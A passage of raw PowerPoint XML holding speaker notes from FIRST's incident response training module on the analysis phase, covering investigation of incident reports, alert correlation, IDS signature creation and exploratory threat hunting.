                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38917" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B94BB13-0D4F-3249-B703-ABE2017EE70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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62" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C74487D3-9183-3145-8FC7-4FD012C4759D}"/>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1FE9CAEB-19A8-2141-A9D7-E1873C3BCB84}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BBDFBA5-4307-BF47-BA61-9BEA2E85B3A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="3219450"/>
            <a:ext cx="6143625" cy="6840538"/>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Analysis Stage Has Fundamental Tenets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In the most general terms, the Analysis phase involves taking your existing input information that has already been collected and prepared (whether actionable or not) and augmenting it with other sources of information to reach new conclusions. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>One example you will receive all the time is an incoming incident report that is delivered to your computer. The report will typically contain a textual description and logs. You will have to perform analysis to generate a conclusion on whether this affects your constituency and, if so, what to do.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This part of processing actionable information is very difficult to automate and is primarily manual. This is where you add the most value to your organization – using your perceptive observations and non-linear thinking. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Often your input data alone coming out of the Preparation stage does not give you enough information to be actionable and you need to enhance it before you can take any action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident investigation is a key activity during the Analysis phase.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The picture above illustrates how analysis can lead to actionable results. The network traffic captured by your honeypot is fed into a program that will extract common patterns. Your analysis of these common patterns will allow you to generate new IDS signatures. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Another example is combining a number of alerts to determine whether they are independent or part of a targeted campaign. If this is a targeted campaign, you can add new patterns, combine alerts together, or issue an advisory. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>What other sources could you use to lead to a new conclusion from an alert or a detection indicator?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You should be able to get a good list from the students. For example, a reputation service would tell you if the domain name was used by malware – intentionally or because of malicious code covertly installed on that machine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8828D0B-8A3D-1848-8CEB-37F353DDA198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3145C6C0-8803-FC4A-A1BD-25D43F203FF0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40965" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55B128B-E93D-4949-9FE8-2C93943A056E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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010" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F63E069-4463-E444-B5CA-8C5A2B788FEE}"/>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6BC036B5-BCB5-8A45-BA7C-D53BF696FCB5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73729" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F071096-2ED4-ED4E-B7FA-F8B21D8CB219}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212725" y="3719513"/>
            <a:ext cx="6430963" cy="6710362"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Exploratory Analysis: Searching for Malicious Activity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4 minutes</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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Exploratory analysis is the process of looking forward instead of backwards; of being proactive instead of reactive. The overall intent of this effort is to find previously-unknown malicious activity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The goal is to discover new anomalies and threats against your environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You’ll want to make this an ongoing exercise within your team, performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>iteratively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This proactive examination has a side benefit of raising the competencies of the staff and the team as a whole. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You will want to take your knowledge of your infrastructure and see if you can spot any unusual behavior. For example, you might discover there is a sudden rise in the number of outgoing SSH connections logged by your firewall, or malware that you had previously identified and eradicated is now being installed on the latest version of your application. With each new discovery you’ll want to explore whether you can create detection indicators. Ideally, these indicators can be implemented in your automated monitoring infrastructure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Share insights you find with your team and with the community as applicable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Does your team have a regular background task of exploratory analysis? If so, what have been the results? If not, do you think you could benefit from this type of activity?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Guide learners back to the principles listed on the slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>So we have explored the many aspects of the investigation part of Analysis. The next area we will discuss is situational awareness. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D0B2A5-38D0-A64A-A2F2-C0502211DA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{F185EEA8-9477-5A41-9D68-F3B5DBA90421}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59C001B0-E736-804F-B0FF-B37C9B244C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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00353" name="Shape 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA48EDB-3EDD-8144-A5A3-D64C7B4B500B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5484813" cy="4113213"/>
          </a:xfrm>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                <a:solidFill>
                  <a:srgbClr val="3465A4"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100354" name="Shape 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C7D222-AA51-4042-B21F-B847FE320101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3427413"/>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 name="T10" fmla="*/ 0 w 120000"/>
              <a:gd name="T11" fmla="*/ 0 h 120000"/>
              <a:gd name="T12" fmla="*/ 120000 w 120000"/>
              <a:gd name="T13" fmla="*/ 120000 h 120000"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T10" t="T11" r="T12" b="T13"/>
            <a:pathLst>
              <a:path w="120000" h="120000" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>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058" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A756933A-F9B4-134D-BFFC-41F1D6E56B55}"/>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C01CAF1A-520B-8C47-930F-8D6AAF770C01}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CCAD986-6D71-E443-9CD0-BC8CF99F51D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="3219450"/>
            <a:ext cx="6143625" cy="6840538"/>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Analysis Stage Has Fundamental Tenets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
